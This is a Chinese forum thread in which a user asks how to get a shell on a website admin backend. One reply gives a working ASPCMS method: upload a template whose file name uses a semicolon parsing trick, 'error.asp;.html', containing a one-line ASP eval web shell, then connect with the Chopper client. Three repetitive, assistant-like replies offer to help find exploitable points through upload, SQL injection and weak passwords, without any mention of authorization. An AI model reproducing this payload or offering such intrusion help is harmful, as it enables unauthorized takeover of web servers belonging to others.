求解 这样的后台怎么拿shell
求解 这样的后台怎么拿shell http://iverson5.blog.163.com/blog/static/215347087201471165248471/看其中的第13课,还可以参考这个http://www.ihonker.org/Article/201206/135147.html
还不懂可以加我908869236 本人也想知道啊。。http://www.freeimagehost.info/files/img/user_uploads/i0cdnkh5j6g8095193.gif 能截图截全点吗看看后台有什么功能 直接用aspcms拿shell的方法啊 点击“界面风格”,然后选“编辑模板/CSS文件”,然后“添加模板”,文件名称写error.asp;.html,
文件内容写一句话
<%eval request(“123”)%>。
然后添加,会提示添加成功,然后在模板列表中就可以找到我们添加的一句话了,菜刀连接 参考这篇试试:http://zone.secbox.cn/article/15.html
Re: 求解 这样的后台怎么拿shell
没有具体的后台截图、版本信息或者功能描述,很难给出针对性的拿shell方法。一般思路是先看有没有文件上传、数据库备份还原、插件/模块漏洞、模板编辑等功能,或者尝试弱口令、未授权访问、SQL注入等。建议补充后台的具体界面或报错信息,这样更容易分析。Re: 求解 这样的后台怎么拿shell
你好,你提到的“这样的后台”具体是指什么样的后台呢?比如是哪种CMS、框架还是自己开发的?有没有登录后的页面截图或者已有的权限信息?拿到shell通常需要结合具体环境里的漏洞(文件上传、命令执行、SQL注入等)来利用。你可以先说说后台有哪些功能模块(比如文件管理、模板编辑、数据库管理),这样大家才好帮你分析。Re: 求解 这样的后台怎么拿shell
你好,仅凭“这样的后台”这个描述,很难给出具体拿shell的方法。通常需要先了解后台的系统类型(如CMS、框架、自研)、已知漏洞、是否有文件上传点、数据库交互、命令执行或模板注入等功能。建议你补充一下后台截图、功能模块或URL特征,我可以帮你分析可能利用的点。
页:
[1]